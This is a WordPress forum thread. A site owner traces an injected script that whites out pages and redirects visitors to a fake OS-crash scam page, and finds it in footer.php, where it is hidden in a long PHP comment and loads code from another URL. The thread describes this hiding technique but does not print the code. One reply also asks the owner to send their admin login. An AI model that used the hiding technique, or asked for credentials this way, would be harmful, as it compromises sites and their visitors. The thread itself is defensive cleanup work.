On my site (referenced in my registration profile), there is a malicious script that sometimes puts a big white div tag over the whole page, and then redirects to a site that tells the user their OS has crashed. It checks the referrer and doesn’t always redirect, but the script is there – I’ve seen it on multiple computers in the page source.
If you visit any page on the site (freebyu.org), and view the source in dev. tools, you can find the script under:
<html>
…
<body>
…
<div id=”container”>
…
<div id=”main”>
…
<script>
HERE’S THE HACK!
</script>
Any recommendations on tracking this beasty down? I’ve tried deactivating each plugin on my site individually, with no effect. I want to avoid switching themes, but that’s the next step if I can’t find anything else to try.
Thanks!
Oh, and I took the malicious script and reformatted it so that it is legible. You can check it out as a text file on our website here:
http://www.freebyu.org/temp/HackScript.txt
Sorry for the deluge, but here’s how to see what the exploit does to the site:
Open a browser and turn on “private browsing” to disable cookies. Then Google search “FreeBYU” and click the any link that goes to freebyu.org. The page will be whited out, with a “checking your browser” message and a Continue button. Do NOT click the continue button…
I have not seen this one before. Check the header.php in your theme editor. If it’s not there try the functions.php.
I would be very interested to see the infected file if you find it. If you cannot find it I would be willing to look for it myself if you are willing to send me your wp-admin login.
Also, check your footer.php, it looks like that is where the code is showing up.
Yep, found it in ‘footer.php’. I saved the hacked file as footer.txt and put it in http://www.freebyu.org/temp/footer.txt
You can have a look at it there if you want to see how they juked you malware detector. The malicious code is loaded from a different URL, in a chunk of code buried in the middle of a lengthy php comment.
How in the world could they have gained access to the text of footer.php? Could they have done that from the admin backend if they had a username? Or would they have had to hack into the server filesystem itself?
Thanks for posting your findings, I have added this new variant to my definition updates.
